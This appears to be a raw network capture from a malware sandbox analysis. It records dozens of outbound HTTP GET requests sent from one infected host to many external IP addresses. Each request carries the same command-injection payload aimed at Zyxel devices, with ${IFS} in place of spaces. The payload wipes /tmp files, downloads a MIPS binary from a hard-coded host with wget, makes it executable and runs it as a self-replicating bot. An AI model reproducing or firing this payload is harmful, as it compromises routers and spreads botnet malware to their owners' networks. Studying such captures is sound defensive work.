                                                  Jan 19, 2024 18:24:07.287498951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7268192.168.2.134090876.35.56.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287530899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7269192.168.2.133313237.205.118.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287554979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7270192.168.2.1352102213.252.52.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287586927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7271192.168.2.135718425.171.168.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287610054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7272192.168.2.1360944207.208.237.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287646055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7273192.168.2.135920447.6.59.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287693977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7274192.168.2.13435884.131.225.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287743092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7275192.168.2.133396869.94.60.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287763119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7276192.168.2.1344112206.136.98.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287817955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7277192.168.2.1343216173.253.11.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287858963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7278192.168.2.135168290.155.205.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287883997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7279192.168.2.1344326211.131.120.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287928104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7280192.168.2.133626077.209.2.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287974119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7281192.168.2.134132060.225.123.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288011074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7282192.168.2.1341640212.8.90.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288052082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7283192.168.2.135936823.139.94.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288074017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7284192.168.2.1348826118.211.224.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288136959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7285192.168.2.136091234.213.156.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288183928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7286192.168.2.1351860207.108.167.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288243055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7287192.168.2.133431060.107.26.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288283110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7288192.168.2.1334702219.196.105.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288326979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7289192.168.2.134052213.148.89.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288362980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7290192.168.2.1359624137.26.240.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288395882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7291192.168.2.1348230185.94.54.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288439035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7292192.168.2.1350702208.26.231.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288486958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7293192.168.2.1341518192.108.1.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288541079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7294192.168.2.1356894222.13.39.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288583040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7295192.168.2.1352026223.85.137.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288611889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7296192.168.2.1355732122.156.24.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288642883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7297192.168.2.1352712205.194.194.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288676023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7298192.168.2.133404641.101.204.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288712025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7299192.168.2.1333708131.118.164.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288759947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7300192.168.2.1342636160.224.117.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288815975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7301192.168.2.134734447.238.32.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288839102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7302192.168.2.13362621.146.61.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288897991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7303192.168.2.134078217.181.106.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288925886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7304192.168.2.135193674.158.162.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.288969994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7305192.168.2.1356180182.44.113.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289026022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7306192.168.2.1346020157.183.115.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289061069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7307192.168.2.1358366157.77.136.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289097071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7308192.168.2.136027845.13.218.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289151907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7309192.168.2.1352012221.171.78.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289203882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7310192.168.2.1358590121.6.203.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289236069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7311192.168.2.1346336207.242.87.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289261103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7312192.168.2.135574494.173.148.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289294958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7313192.168.2.1347648121.212.95.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289345980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7314192.168.2.1346796171.41.98.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289392948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7315192.168.2.134188641.152.121.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289413929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7316192.168.2.1339240151.245.106.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289444923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7317192.168.2.1355228209.147.185.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289483070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7318192.168.2.134187280.245.137.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289541960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7319192.168.2.1351940149.232.216.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289591074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7320192.168.2.133905252.191.195.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289623022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7321192.168.2.1340818174.187.236.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289669991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7322192.168.2.134398827.51.59.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289701939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7323192.168.2.1341180185.227.217.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289743900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7324192.168.2.1357556187.18.29.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289777994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7325192.168.2.13492108.12.65.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289809942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7326192.168.2.133602687.246.164.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289863110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7327192.168.2.1335622112.53.182.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289894104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7328192.168.2.1352818211.119.180.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289937973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7329192.168.2.1360986111.227.220.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.289988041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7330192.168.2.1346118211.181.230.81443
                                                  TimestampBytes transferredDirectionData
